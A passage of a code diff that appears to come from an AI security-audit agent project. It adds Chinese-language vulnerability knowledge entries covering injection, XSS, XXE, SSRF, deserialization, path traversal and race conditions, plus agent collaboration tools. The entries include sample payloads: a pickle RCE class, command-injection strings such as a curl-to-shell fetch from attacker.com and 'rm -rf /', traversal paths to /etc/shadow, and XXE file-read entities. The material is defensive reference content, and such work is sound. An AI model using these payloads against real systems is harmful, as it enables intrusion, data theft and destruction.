3. 使用.gitignore排除敏感文件
4. 使用git-secrets防止提交
5. 定期轮换密钥
## 修复示例
```python
# 安全 - 环境变量
import os
password = os.environ.get("DB_PASSWORD")
api_key = os.environ.get("API_KEY")
# 安全 - 配置文件引用环境变量
# config.yaml
database:
password: ${DB_PASSWORD}
```
""",
)

View File

@ -0,0 +1,119 @@
"""
反序列化漏洞知识
"""
from ..base import KnowledgeDocument, KnowledgeCategory
INSECURE_DESERIALIZATION = KnowledgeDocument(
id="vuln_deserialization",
title="Insecure Deserialization",
category=KnowledgeCategory.VULNERABILITY,
tags=["deserialization", "pickle", "yaml", "json", "object", "rce"],
severity="critical",
cwe_ids=["CWE-502"],
owasp_ids=["A08:2021"],
content="""
不安全的反序列化可能导致远程代码执行拒绝服务或权限提升
## 危险模式
### Python Pickle
```python
# 危险 - 反序列化不可信数据
import pickle
data = pickle.loads(user_data)
data = pickle.load(open(user_file, 'rb'))
# 危险 - 通过网络接收
data = pickle.loads(request.data)
```
### Python YAML
```python
# 危险 - 不安全的yaml.load
import yaml
data = yaml.load(user_input) # 不带Loader参数
data = yaml.load(user_input, Loader=yaml.Loader) # 不安全的Loader
```
### Python Marshal
```python
# 危险
import marshal
code = marshal.loads(user_data)
```
### Java
```java
// 危险 - ObjectInputStream
ObjectInputStream ois = new ObjectInputStream(userInput);
Object obj = ois.readObject();
// 危险 - XMLDecoder
XMLDecoder decoder = new XMLDecoder(userInput);
Object obj = decoder.readObject();
```
### PHP
```php
// 危险
$data = unserialize($_POST['data']);
```
### Node.js
```javascript
// 危险 - node-serialize
var serialize = require('node-serialize');
var obj = serialize.unserialize(userInput);
```
## 攻击原理
```python
# Pickle RCE示例
import pickle
import os
class Exploit:
def __reduce__(self):
return (os.system, ('id',))
payload = pickle.dumps(Exploit())
# 反序列化时执行os.system('id')
```
## 检测要点
1. 搜索pickle.loads, yaml.load, unserialize
2. 检查数据来源是否可信
3. 检查是否有签名验证
4. 关注网络接收的序列化数据
## 安全实践
1. 避免反序列化不可信数据
2. 使用安全的序列化格式JSON
3. 使用yaml.safe_load()
4. 实现完整性检查HMAC签名
5. 使用白名单限制可反序列化的类
## 修复示例
```python
# 安全 - 使用JSON
import json
data = json.loads(user_input)
# 安全 - 使用safe_load
import yaml
data = yaml.safe_load(user_input)
# 安全 - 签名验证
import hmac
import pickle
def safe_loads(data, signature, key):
expected_sig = hmac.new(key, data, 'sha256').hexdigest()
if not hmac.compare_digest(signature, expected_sig):
raise ValueError("Invalid signature")
return pickle.loads(data)
```
""",
)

View File

@ -0,0 +1,273 @@
"""
注入类漏洞知识
"""
from ..base import KnowledgeDocument, KnowledgeCategory
SQL_INJECTION = KnowledgeDocument(
id="vuln_sql_injection",
title="SQL Injection",
category=KnowledgeCategory.VULNERABILITY,
tags=["sql", "injection", "database", "input-validation", "sqli"],
severity="critical",
cwe_ids=["CWE-89"],
owasp_ids=["A03:2021"],
content="""
SQL注入是一种代码注入技术攻击者通过在应用程序查询中插入恶意SQL代码来操纵数据库
## 危险模式
### Python
```python
# 危险 - 字符串拼接
query = "SELECT * FROM users WHERE id = " + user_id
cursor.execute(f"SELECT * FROM users WHERE name = '{name}'")
query = "SELECT * FROM users WHERE id = %s" % user_id
# 危险 - ORM原始查询
User.objects.raw(f"SELECT * FROM users WHERE name = '{name}'")
db.execute(text(f"SELECT * FROM users WHERE id = {user_id}"))
```
### JavaScript/Node.js
```javascript
// 危险
const query = `SELECT * FROM users WHERE id = ${userId}`;
connection.query("SELECT * FROM users WHERE name = '" + name + "'");
```
### Java
```java
// 危险
String query = "SELECT * FROM users WHERE id = " + userId;
Statement stmt = conn.createStatement();
stmt.executeQuery(query);
```
## 检测关键词
- execute, query, raw, cursor
- SELECT, INSERT, UPDATE, DELETE
- 字符串拼接 (+, f-string, format, %)
- WHERE, AND, OR 后跟变量
## 安全实践
1. 使用参数化查询/预编译语句
2. 使用ORM框架的安全API
3. 输入验证和类型检查
4. 最小权限原则
5. 使用存储过程
## 修复示例
```python
# 安全 - 参数化查询
cursor.execute("SELECT * FROM users WHERE id = %s", (user_id,))
# 安全 - ORM
User.objects.filter(id=user_id)
# 安全 - SQLAlchemy
db.query(User).filter(User.id == user_id)
```
## 验证方法
1. 尝试单引号 ' 触发语法错误
2. 使用 OR 1=1 测试布尔注入
3. 使用 SLEEP() 测试时间盲注
4. 检查错误信息是否泄露数据库信息
""",
)
NOSQL_INJECTION = KnowledgeDocument(
id="vuln_nosql_injection",
title="NoSQL Injection",
category=KnowledgeCategory.VULNERABILITY,
tags=["nosql", "mongodb", "injection", "database"],
severity="high",
cwe_ids=["CWE-943"],
owasp_ids=["A03:2021"],
content="""
NoSQL注入针对MongoDB等NoSQL数据库通过操纵查询对象来绕过认证或提取数据
## 危险模式
### MongoDB (Python)
```python
# 危险 - 直接使用用户输入构建查询
db.users.find({"username": username, "password": password})
# 攻击者可传入 {"$ne": ""} 绕过认证
# 危险 - $where操作符
db.users.find({"$where": f"this.name == '{name}'"})
```
### MongoDB (Node.js)
```javascript
// 危险
db.collection('users').find({username: req.body.username});
// 攻击者可传入 {$gt: ""} {$ne: null}
```
## 攻击载荷示例
```json
// 绕过认证
{"username": {"$ne": ""}, "password": {"$ne": ""}}
{"username": {"$gt": ""}, "password": {"$gt": ""}}
// 正则注入
{"username": {"$regex": "^admin"}}
```
## 安全实践
1. 验证输入类型确保是字符串而非对象
2. 使用白名单验证
3. 避免使用$where操作符
4. 使用mongoose等ODM的类型验证
## 修复示例
```python
# 安全 - 类型验证
if not isinstance(username, str):
raise ValueError("Invalid username type")
db.users.find({"username": str(username)})
```
""",
)
COMMAND_INJECTION = KnowledgeDocument(
id="vuln_command_injection",
title="Command Injection",
category=KnowledgeCategory.VULNERABILITY,
tags=["command", "injection", "shell", "os", "system", "rce"],
severity="critical",
cwe_ids=["CWE-78"],
owasp_ids=["A03:2021"],
content="""
命令注入允许攻击者在主机操作系统上执行任意命令可能导致完全系统控制
## 危险模式
### Python
```python
# 危险
os.system("ping " + user_input)
os.popen("ls " + directory)
subprocess.call("ls " + directory, shell=True)
subprocess.Popen(cmd, shell=True)
commands.getoutput("cat " + filename)
# 危险 - eval/exec
eval(user_input)
exec(user_code)
```
### Node.js
```javascript
// 危险
exec("ls " + userInput);
execSync(`cat ${filename}`);
spawn("sh", ["-c", userCommand]);
```
### PHP
```php
// 危险
system("ping " . $ip);
exec("cat " . $file);
shell_exec($cmd);
passthru($command);
```
## 攻击载荷
```bash
; ls -la
| cat /etc/passwd
`whoami`
$(id)
&& rm -rf /
|| curl attacker.com/shell.sh | sh
```
## 安全实践
1. 避免使用shell=True
2. 使用参数列表而非字符串
3. 输入验证和白名单
4. 使用安全的替代API
5. 沙箱执行
## 修复示例
```python
# 安全 - 参数列表
subprocess.run(["ping", "-c", "4", validated_host], shell=False)
# 安全 - shlex转义
import shlex
subprocess.run(shlex.split(f"ping -c 4 {shlex.quote(host)}"))
```
""",
)
CODE_INJECTION = KnowledgeDocument(
id="vuln_code_injection",
title="Code Injection",
category=KnowledgeCategory.VULNERABILITY,
tags=["code", "injection", "eval", "exec", "rce"],
severity="critical",
cwe_ids=["CWE-94"],
owasp_ids=["A03:2021"],
content="""
代码注入允许攻击者注入并执行任意代码通常通过eval()等动态执行函数
## 危险模式
### Python
```python
# 危险
eval(user_input)
exec(user_code)
compile(user_code, '<string>', 'exec')
# 危险 - 模板注入
template = Template(user_input)
render_template_string(user_input)
```
### JavaScript
```javascript
// 危险
eval(userInput);
new Function(userCode)();
setTimeout(userCode, 1000);
setInterval(userCode, 1000);
```
### PHP
```php
// 危险
eval($code);
assert($code);
preg_replace('/e', $code, $input); // PHP < 7
create_function('', $code);
```
## 安全实践
1. 永远不要eval用户输入
2. 使用AST解析代替eval
3. 使用沙箱环境
4. 白名单允许的操作
## 修复示例
```python
# 安全 - 使用ast.literal_eval处理数据
import ast
data = ast.literal_eval(user_input) # 只允许字面量
# 安全 - 使用json解析
import json
data = json.loads(user_input)
```
""",
)

View File

@ -0,0 +1,129 @@
"""
路径遍历漏洞知识
"""
from ..base import KnowledgeDocument, KnowledgeCategory
PATH_TRAVERSAL = KnowledgeDocument(
id="vuln_path_traversal",
title="Path Traversal",
category=KnowledgeCategory.VULNERABILITY,
tags=["path", "traversal", "file", "directory", "lfi", "rfi"],
severity="high",
cwe_ids=["CWE-22", "CWE-23"],
owasp_ids=["A01:2021"],
content="""
路径遍历允许攻击者访问应用程序根目录之外的文件可能导致敏感信息泄露或代码执行
## 危险模式
### Python
```python
# 危险 - 直接拼接路径
file_path = "/uploads/" + user_filename
open(base_dir + request.args['file'])
os.path.join(base_dir, user_input) # 仍然危险!
# 危险 - 文件下载
@app.route('/download')
def download():
filename = request.args.get('file')
return send_file(f'/files/{filename}')
# 危险 - 模板包含
render_template(user_template)
```
### Node.js
```javascript
// 危险
const filePath = path.join(__dirname, req.query.file);
fs.readFile('./uploads/' + filename);
res.sendFile(req.params.path);
```
### PHP
```php
// 危险
include($_GET['page']);
require($user_input);
file_get_contents($filename);
```
## 攻击载荷
```
../../../etc/passwd
..\\..\\..\\windows\\system32\\config\\sam
....//....//....//etc/passwd
..%2f..%2f..%2fetc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
..%252f..%252f..%252fetc/passwd (双重编码)
```
## 敏感文件目标
```
# Linux
/etc/passwd
/etc/shadow
/etc/hosts
/proc/self/environ
/var/log/apache2/access.log
# Windows
C:\\Windows\\System32\\config\\SAM
C:\\Windows\\win.ini
C:\\inetpub\\logs\\LogFiles
# 应用配置
.env
config.php
settings.py
application.yml
```
## 检测要点
1. 所有文件操作函数
2. 用户输入是否用于构建路径
3. 是否有路径规范化
4. 是否验证最终路径在允许范围内
## 安全实践
1. 验证和规范化路径
2. 使用白名单
3. 检查路径是否在允许目录内
4. 使用安全的文件ID映射
## 修复示例
```python
import os
def safe_join(base_dir, user_path):
# 规范化路径
base_dir = os.path.abspath(base_dir)
full_path = os.path.abspath(os.path.join(base_dir, user_path))
# 验证路径在基础目录内
if not full_path.startswith(base_dir + os.sep):
raise ValueError("Path traversal detected")
return full_path
# 使用
try:
safe_path = safe_join('/uploads', user_filename)
with open(safe_path) as f:
content = f.read()
except ValueError:
abort(403)
# 更安全 - 使用文件ID映射
@app.route('/download/<file_id>')
def download(file_id):
file_record = File.query.get(file_id)
if file_record and file_record.user_id == current_user.id:
return send_file(file_record.path)
abort(404)
```
""",
)

View File

@ -0,0 +1,134 @@
"""
竞态条件漏洞知识
"""
from ..base import KnowledgeDocument, KnowledgeCategory
RACE_CONDITION = KnowledgeDocument(
id="vuln_race_condition",
title="Race Condition",
category=KnowledgeCategory.VULNERABILITY,
tags=["race", "condition", "toctou", "concurrency", "thread"],
severity="medium",
cwe_ids=["CWE-362", "CWE-367"],
owasp_ids=["A04:2021"],
content="""
竞态条件发生在多个操作之间存在时间窗口攻击者可以利用这个窗口改变系统状态
## 危险模式
### TOCTOU (Time-of-Check to Time-of-Use)
```python
# 危险 - 检查和使用之间有时间窗口
if os.path.exists(filepath): # 检查
# 攻击者可在此时替换文件
with open(filepath) as f: # 使用
data = f.read()
# 危险 - 余额检查
if user.balance >= amount: # 检查
# 并发请求可能同时通过检查
user.balance -= amount # 使用
db.commit()
```
### 双重支付/提现
```python
# 危险 - 无锁的余额操作
@app.route('/withdraw', methods=['POST'])
def withdraw():
amount = request.json['amount']
if current_user.balance >= amount:
current_user.balance -= amount
db.commit()
return transfer_money(amount)
```
### 文件操作竞态
```python
# 危险 - 临时文件
import tempfile
fd, path = tempfile.mkstemp()
# 攻击者可能在此时访问或替换文件
os.chmod(path, 0o644)
```
### 会话竞态
```python
# 危险 - 会话更新
session['cart_total'] = calculate_total()
# 并发请求可能覆盖
apply_discount(session['cart_total'])
```
## 检测要点
1. 检查-使用模式if exists then use
2. 余额/库存等数值操作
3. 文件创建和权限设置
4. 无锁的数据库操作
5. 会话状态修改
## 安全实践
1. 使用数据库事务和锁
2. 原子操作
3. 使用文件锁
4. 乐观锁/悲观锁
5. 幂等性设计
## 修复示例
### 数据库锁
```python
# 安全 - 使用SELECT FOR UPDATE
from sqlalchemy import select
@app.route('/withdraw', methods=['POST'])
def withdraw():
amount = request.json['amount']
with db.begin():
# 行级锁
user = db.execute(
select(User).where(User.id == current_user.id).with_for_update()
).scalar_one()
if user.balance >= amount:
user.balance -= amount
return transfer_money(amount)
else:
return "Insufficient balance", 400
```
### 原子操作
```python
# 安全 - 原子更新
from sqlalchemy import update
result = db.execute(
update(User)
.where(User.id == user_id)
.where(User.balance >= amount) # 条件更新
.values(balance=User.balance - amount)
)
if result.rowcount == 0:
return "Insufficient balance", 400
```
### 文件锁
```python
# 安全 - 使用文件锁
import fcntl
with open(filepath, 'r+') as f:
fcntl.flock(f.fileno(), fcntl.LOCK_EX)
try:
data = f.read()
# 处理数据
f.seek(0)
f.write(new_data)
finally:
fcntl.flock(f.fileno(), fcntl.LOCK_UN)
```
""",
)

View File

@ -0,0 +1,118 @@
"""
SSRF (服务端请求伪造) 漏洞知识
"""
from ..base import KnowledgeDocument, KnowledgeCategory
SSRF = KnowledgeDocument(
id="vuln_ssrf",
title="Server-Side Request Forgery (SSRF)",
category=KnowledgeCategory.VULNERABILITY,
tags=["ssrf", "request", "url", "network", "internal", "cloud"],
severity="high",
cwe_ids=["CWE-918"],
owasp_ids=["A10:2021"],
content="""
SSRF允许攻击者诱使服务器向内部资源或任意外部地址发起请求
## 危险模式
### Python
```python
# 危险 - 直接使用用户URL
response = requests.get(user_provided_url)
urllib.request.urlopen(url_from_user)
httpx.get(user_url)
# 危险 - URL拼接
base_url = "http://internal-api/"
requests.get(base_url + user_path)
# 危险 - 图片/文件获取
image_url = request.args.get('url')
response = requests.get(image_url)
```
### Node.js
```javascript
// 危险
fetch(req.body.url);
axios.get(userUrl);
http.get(url, callback);
```
## 攻击目标
1. 内部服务 (localhost, 127.0.0.1, 内网IP)
2. 云元数据服务
- AWS: http://169.254.169.254/latest/meta-data/
- GCP: http://metadata.google.internal/
- Azure: http://169.254.169.254/metadata/
3. 内部API和数据库
4. 文件协议 (file://)
## 绕过技术
```
# IP绕过
http://127.0.0.1 -> http://127.1 -> http://0
http://localhost -> http://[::1]
http://2130706433 (十进制)
http://0x7f000001 (十六进制)
# DNS重绑定
attacker.com -> 解析到内网IP
# URL解析差异
http://evil.com@internal/
http://internal#@evil.com
```
## 检测要点
1. 所有发起HTTP请求的地方
2. URL参数是否来自用户
3. 是否有URL白名单验证
4. 是否限制了协议和端口
## 安全实践
1. URL白名单验证
2. 禁止访问内部IP地址
3. 使用DNS解析验证
4. 限制协议仅http/https
5. 禁用重定向或限制重定向
## 修复示例
```python
import ipaddress
from urllib.parse import urlparse
def is_safe_url(url):
try:
parsed = urlparse(url)
# 只允许http/https
if parsed.scheme not in ['http', 'https']:
return False
# 解析IP
import socket
ip = socket.gethostbyname(parsed.hostname)
ip_obj = ipaddress.ip_address(ip)
# 禁止私有IP
if ip_obj.is_private or ip_obj.is_loopback:
return False
# 白名单域名
if parsed.hostname not in ALLOWED_HOSTS:
return False
return True
except:
return False
# 使用
if is_safe_url(user_url):
response = requests.get(user_url, allow_redirects=False)
```
""",
)

View File

@ -0,0 +1,205 @@
"""
XSS (跨站脚本) 漏洞知识
"""
from ..base import KnowledgeDocument, KnowledgeCategory
XSS_REFLECTED = KnowledgeDocument(
id="vuln_xss_reflected",
title="Reflected XSS",
category=KnowledgeCategory.VULNERABILITY,
tags=["xss", "reflected", "javascript", "html", "injection"],
severity="high",
cwe_ids=["CWE-79"],
owasp_ids=["A03:2021"],
content="""
反射型XSS恶意脚本来自当前HTTP请求服务器将用户输入直接反射到响应中
## 危险模式
### Python/Flask
```python
# 危险 - 直接返回用户输入
@app.route('/search')
def search():
query = request.args.get('q')
return f"<h1>搜索结果: {query}</h1>"
# 危险 - 禁用自动转义
return render_template_string(user_input)
return Markup(user_input)
```
### JavaScript/Express
```javascript
// 危险
res.send(`<h1>Hello ${req.query.name}</h1>`);
res.write(req.body.content);
```
### PHP
```php
// 危险
echo "Hello " . $_GET['name'];
print($_POST['content']);
```
## 攻击载荷
```html
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
javascript:alert('XSS')
<body onload=alert('XSS')>
```
## 安全实践
1. 输出编码/HTML转义
2. 使用模板引擎的自动转义
3. Content-Type设置正确
4. 使用CSP头
## 修复示例
```python
# 安全 - 使用escape
from markupsafe import escape
return f"<h1>搜索结果: {escape(query)}</h1>"
# 安全 - 使用模板(自动转义)
return render_template('search.html', query=query)
```
""",
)
XSS_STORED = KnowledgeDocument(
id="vuln_xss_stored",
title="Stored XSS",
category=KnowledgeCategory.VULNERABILITY,
tags=["xss", "stored", "persistent", "javascript", "database"],
severity="high",
cwe_ids=["CWE-79"],
owasp_ids=["A03:2021"],
content="""
存储型XSS恶意脚本被存储在服务器数据库文件等当其他用户访问时执行
## 危险场景
- 用户评论/留言板
- 用户个人资料
- 论坛帖子
- 文件名/描述
- 日志查看器
## 危险模式
```python
# 危险 - 存储未过滤的用户输入
comment = request.form['comment']
db.save_comment(comment) # 存储
# 危险 - 显示未转义的内容
comments = db.get_comments()
return render_template_string(f"<div>{comments}</div>")
```
## 检测要点
1. 追踪用户输入到数据库的流程
2. 检查从数据库读取后的输出处理
3. 关注富文本编辑器的处理
4. 检查管理后台的数据展示
## 安全实践
1. 输入时过滤/存储时转义
2. 输出时始终转义
3. 使用白名单HTML标签如需富文本
4. 使用DOMPurify等库清理HTML
## 修复示例
```python
# 安全 - 使用bleach清理HTML
import bleach
clean_comment = bleach.clean(comment, tags=['p', 'b', 'i'])
db.save_comment(clean_comment)
```
""",
)
XSS_DOM = KnowledgeDocument(
id="vuln_xss_dom",
title="DOM-based XSS",
category=KnowledgeCategory.VULNERABILITY,
tags=["xss", "dom", "javascript", "client-side"],
severity="high",
cwe_ids=["CWE-79"],
owasp_ids=["A03:2021"],
content="""
DOM型XSS漏洞存在于客户端JavaScript代码通过修改DOM环境执行恶意脚本
## 危险源 (Sources)
```javascript
// URL相关
location.href
location.search
location.hash
document.URL
document.referrer
// 存储相关
localStorage.getItem()
sessionStorage.getItem()
// 消息相关
window.postMessage
```
## 危险汇 (Sinks)
```javascript
// 危险 - HTML注入
element.innerHTML = userInput;
element.outerHTML = userInput;
document.write(userInput);
document.writeln(userInput);
// 危险 - JavaScript执行
eval(userInput);
setTimeout(userInput, 1000);
setInterval(userInput, 1000);
new Function(userInput);
// 危险 - URL跳转
location.href = userInput;
location.assign(userInput);
window.open(userInput);
```
## 危险模式
```javascript
// 危险 - 从URL获取并直接使用
const name = new URLSearchParams(location.search).get('name');
document.getElementById('greeting').innerHTML = 'Hello ' + name;
// 危险 - hash注入
const hash = location.hash.substring(1);
document.getElementById('content').innerHTML = decodeURIComponent(hash);
```
## 安全实践
1. 使用textContent代替innerHTML
2. 使用安全的DOM API
3. 对URL参数进行验证
4. 使用DOMPurify清理HTML
## 修复示例
```javascript
// 安全 - 使用textContent
element.textContent = userInput;
// 安全 - 使用DOMPurify
element.innerHTML = DOMPurify.sanitize(userInput);
// 安全 - 创建文本节点
element.appendChild(document.createTextNode(userInput));
```
""",
)

View File

@ -0,0 +1,129 @@
"""
XXE (XML外部实体注入) 漏洞知识
"""
from ..base import KnowledgeDocument, KnowledgeCategory
XXE = KnowledgeDocument(
id="vuln_xxe",
title="XML External Entity (XXE) Injection",
category=KnowledgeCategory.VULNERABILITY,
tags=["xxe", "xml", "entity", "injection", "ssrf"],
severity="high",
cwe_ids=["CWE-611"],
owasp_ids=["A05:2021"],
content="""
XXE允许攻击者通过XML外部实体读取服务器文件执行SSRF攻击或导致拒绝服务
## 危险模式
### Python
```python
# 危险 - lxml默认配置
from lxml import etree
doc = etree.parse(user_xml)
doc = etree.fromstring(user_xml)
# 危险 - xml.etree (Python < 3.7.1)
import xml.etree.ElementTree as ET
ET.parse(user_xml)
# 危险 - xml.dom
from xml.dom import minidom
minidom.parseString(user_xml)
```
### Java
```java
// 危险 - DocumentBuilder默认配置
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
DocumentBuilder db = dbf.newDocumentBuilder();
Document doc = db.parse(userInput);
// 危险 - SAXParser
SAXParserFactory spf = SAXParserFactory.newInstance();
SAXParser parser = spf.newSAXParser();
parser.parse(userInput, handler);
```
### PHP
```php
// 危险
$doc = simplexml_load_string($xml);
$doc = new DOMDocument();
$doc->loadXML($xml);
```
## 攻击载荷
### 文件读取
```xml
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>
```
### SSRF
```xml
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://internal-server/api">
]>
<root>&xxe;</root>
```
### 拒绝服务 (Billion Laughs)
```xml
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;">
]>
<root>&lol3;</root>
```
## 检测要点
1. 所有XML解析代码
2. 是否禁用了外部实体
3. 是否禁用了DTD处理
4. 用户输入是否直接解析
## 安全实践
1. 禁用外部实体
2. 禁用DTD处理
3. 使用JSON代替XML
4. 输入验证
## 修复示例
### Python
```python
# 安全 - lxml禁用实体
from lxml import etree
parser = etree.XMLParser(
resolve_entities=False,
no_network=True,
dtd_validation=False,
load_dtd=False
)
doc = etree.parse(user_xml, parser)
# 安全 - defusedxml
import defusedxml.ElementTree as ET
doc = ET.parse(user_xml)
```
### Java
```java
// 安全 - 禁用外部实体
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
```
""",
)

View File

@ -34,7 +34,7 @@ ORCHESTRATOR_SYSTEM_PROMPT = """你是一个专业的代码安全审计 Agent
## 分析方法 ## 分析方法
1. **快速扫描**: 首先使用 pattern_match 快速发现可疑代码 1. **快速扫描**: 首先使用 pattern_match 快速发现可疑代码
2. **语义搜索**: 使用 rag_query 查找相关上下文 2. **语义搜索**: 使用 rag_query 查找相关上下文
3. **深度分析**: 对可疑代码使用 code_analysis 深入分析 3. **深度分析**: 对可疑代码使用 read_file 读取并分析
4. **数据流追踪**: 追踪用户输入到危险函数的路径 4. **数据流追踪**: 追踪用户输入到危险函数的路径
5. **漏洞验证**: 在沙箱中验证发现的漏洞 5. **漏洞验证**: 在沙箱中验证发现的漏洞
@ -67,7 +67,6 @@ ANALYSIS_SYSTEM_PROMPT = """你是一个专注于代码漏洞分析的安全专
## 可用工具 ## 可用工具
- rag_query: 语义搜索相关代码 - rag_query: 语义搜索相关代码
- pattern_match: 快速模式匹配 - pattern_match: 快速模式匹配
- code_analysis: LLM 深度分析
- read_file: 读取文件内容 - read_file: 读取文件内容
- search_code: 关键字搜索 - search_code: 关键字搜索
- dataflow_analysis: 数据流分析 - dataflow_analysis: 数据流分析

View File

@ -1,7 +1,12 @@
""" """
Agent 工具集 Agent 工具集
提供 LangChain Agent 使用的各种工具
包括内置工具和外部安全工具 提供 Agent 使用的各种工具包括
- 基础工具文件操作代码搜索
- 分析工具模式匹配数据流分析
- 外部安全工具SemgrepBandit等
- 协作工具ThinkAgent通信
- 报告工具漏洞报告
""" """
from .base import AgentTool, ToolResult from .base import AgentTool, ToolResult
@ -22,6 +27,23 @@ from .external_tools import (
OSVScannerTool, OSVScannerTool,
) )
# 🔥 新增:思考和推理工具
from .thinking_tool import ThinkTool, ReflectTool
# 🔥 新增:漏洞报告工具
from .reporting_tool import CreateVulnerabilityReportTool
# 🔥 新增Agent协作工具
from .agent_tools import (
CreateSubAgentTool,
SendMessageTool,
ViewAgentGraphTool,
WaitForMessageTool,
AgentFinishTool,
RunSubAgentsTool,
CollectSubAgentResultsTool,
)
__all__ = [ __all__ = [
# 基础 # 基础
"AgentTool", "AgentTool",
@ -57,5 +79,21 @@ __all__ = [
"SafetyTool", "SafetyTool",
"TruffleHogTool", "TruffleHogTool",
"OSVScannerTool", "OSVScannerTool",
# 🔥 思考和推理工具
"ThinkTool",
"ReflectTool",
# 🔥 漏洞报告工具
"CreateVulnerabilityReportTool",
# 🔥 Agent协作工具
"CreateSubAgentTool",
"SendMessageTool",
"ViewAgentGraphTool",
"WaitForMessageTool",
"AgentFinishTool",
"RunSubAgentsTool",
"CollectSubAgentResultsTool",
] ]

View File

@ -0,0 +1,785 @@
"""
Agent 协作工具
提供动态Agent创建通信和管理功能
"""
import logging
from typing import Optional, List, Dict, Any
from pydantic import BaseModel, Field
from .base import AgentTool, ToolResult
from ..core.registry import agent_registry
from ..core.message import message_bus, MessageType, MessagePriority
logger = logging.getLogger(__name__)
class CreateAgentInput(BaseModel):
"""创建Agent输入参数"""
name: str = Field(..., description="Agent名称")
task: str = Field(..., description="任务描述")
agent_type: str = Field(
default="specialist",
description="Agent类型: analysis(分析), verification(验证), specialist(专家)"
)
knowledge_modules: Optional[str] = Field(
default=None,
description="知识模块逗号分隔最多5个。如: sql_injection,xss,authentication"
)
inherit_context: bool = Field(
default=True,
description="是否继承父Agent的上下文"
)
execute_immediately: bool = Field(
default=False,
description="是否立即执行子Agent否则只创建不执行"
)
context: Optional[Dict[str, Any]] = Field(
default=None,
description="传递给子Agent的上下文数据"
)
class CreateSubAgentTool(AgentTool):
"""
创建子Agent工具
允许Agent动态创建专业化的子Agent来处理特定任务
子Agent可以加载特定的知识模块专注于特定领域
支持两种模式
1. 仅创建创建Agent但不执行后续可以批量执行
2. 立即执行创建并立即执行Agent等待结果返回
"""
def __init__(
self,
parent_agent_id: str,
llm_service=None,
tools: Dict[str, Any] = None,
event_emitter=None,
):
super().__init__()
self.parent_agent_id = parent_agent_id
self.llm_service = llm_service
self.tools = tools or {}
self.event_emitter = event_emitter
# 子Agent执行器延迟初始化
self._sub_executor = None
def _get_executor(self):
"""获取子Agent执行器"""
if self._sub_executor is None and self.llm_service:
from ..core.executor import SubAgentExecutor
# 需要获取父Agent实例
parent_agent = agent_registry.get_agent(self.parent_agent_id)
if parent_agent:
self._sub_executor = SubAgentExecutor(
parent_agent=parent_agent,
llm_service=self.llm_service,
tools=self.tools,
event_emitter=self.event_emitter,
)
return self._sub_executor
@property
def name(self) -> str:
return "create_sub_agent"
@property
def description(self) -> str:
return """创建专业化的子Agent来处理特定任务。
使用场景
1. 发现需要深入分析的特定漏洞类型
2. 需要专业知识来验证某个发现
3. 任务过于复杂需要分解
参数:
- name: Agent名称 "SQL注入专家"
- task: 具体任务描述
- agent_type: Agent类型 (analysis/verification/specialist)
- knowledge_modules: 知识模块逗号分隔 "sql_injection,database_security"
- inherit_context: 是否继承当前上下文
- execute_immediately: 是否立即执行默认false仅创建
- context: 传递给子Agent的上下文数据
注意每个Agent最多加载5个知识模块"""
@property
def args_schema(self):
return CreateAgentInput
async def _execute(
self,
name: str,
task: str,
agent_type: str = "specialist",
knowledge_modules: Optional[str] = None,
inherit_context: bool = True,
execute_immediately: bool = False,
context: Optional[Dict[str, Any]] = None,
**kwargs
) -> ToolResult:
"""创建子Agent"""
if not name or not name.strip():
return ToolResult(success=False, error="Agent名称不能为空")
if not task or not task.strip():
return ToolResult(success=False, error="任务描述不能为空")
# 解析知识模块
modules = []
if knowledge_modules:
modules = [m.strip() for m in knowledge_modules.split(",") if m.strip()]
if len(modules) > 5:
return ToolResult(
success=False,
error="知识模块数量不能超过5个"
)
# 验证知识模块(如果有)
if modules:
from ..knowledge import knowledge_loader
validation = knowledge_loader.validate_modules(modules)
if validation["invalid"]:
available = knowledge_loader.get_all_module_names()
return ToolResult(
success=False,
error=f"无效的知识模块: {validation['invalid']}。可用模块: {', '.join(available)}"
)
# 生成Agent ID
from ..core.state import _generate_agent_id
agent_id = _generate_agent_id()
# 注册到注册表
node = agent_registry.register_agent(
agent_id=agent_id,
agent_name=name.strip(),
agent_type=agent_type,
task=task.strip(),
parent_id=self.parent_agent_id,
knowledge_modules=modules,
)
# 创建消息队列
message_bus.create_queue(agent_id)
logger.info(f"Created sub-agent: {name} ({agent_id}), parent: {self.parent_agent_id}")
# 如果需要立即执行
if execute_immediately:
executor = self._get_executor()
if executor:
# 准备上下文
exec_context = context or {}
exec_context["knowledge_modules"] = modules
# 执行子Agent
exec_result = await executor.create_and_run_sub_agent(
agent_type=agent_type if agent_type in ["analysis", "verification"] else "analysis",
task=task.strip(),
context=exec_context,
knowledge_modules=modules,
)
# 更新注册表状态
if exec_result.get("success"):
agent_registry.update_agent_status(agent_id, "completed", exec_result)
else:
agent_registry.update_agent_status(agent_id, "failed", {"error": exec_result.get("error")})
return ToolResult(
success=exec_result.get("success", False),
data={
"message": f"子Agent '{name}' 已执行完成" if exec_result.get("success") else f"子Agent '{name}' 执行失败",
"agent_id": agent_id,
"execution_result": exec_result,
"findings": exec_result.get("data", {}).get("findings", []) if exec_result.get("success") else [],
},
error=exec_result.get("error"),
metadata=node,
)
else:
logger.warning("SubAgentExecutor not available, agent created but not executed")
return ToolResult(
success=True,
data={
"message": f"子Agent '{name}' 已创建",
"agent_id": agent_id,
"agent_info": {
"id": agent_id,
"name": name,
"type": agent_type,
"task": task[:100],
"knowledge_modules": modules,
"parent_id": self.parent_agent_id,
"status": "created",
}
},
metadata=node,
)
class SendMessageInput(BaseModel):
"""发送消息输入参数"""
target_agent_id: str = Field(..., description="目标Agent ID")
message: str = Field(..., description="消息内容")
message_type: str = Field(
default="information",
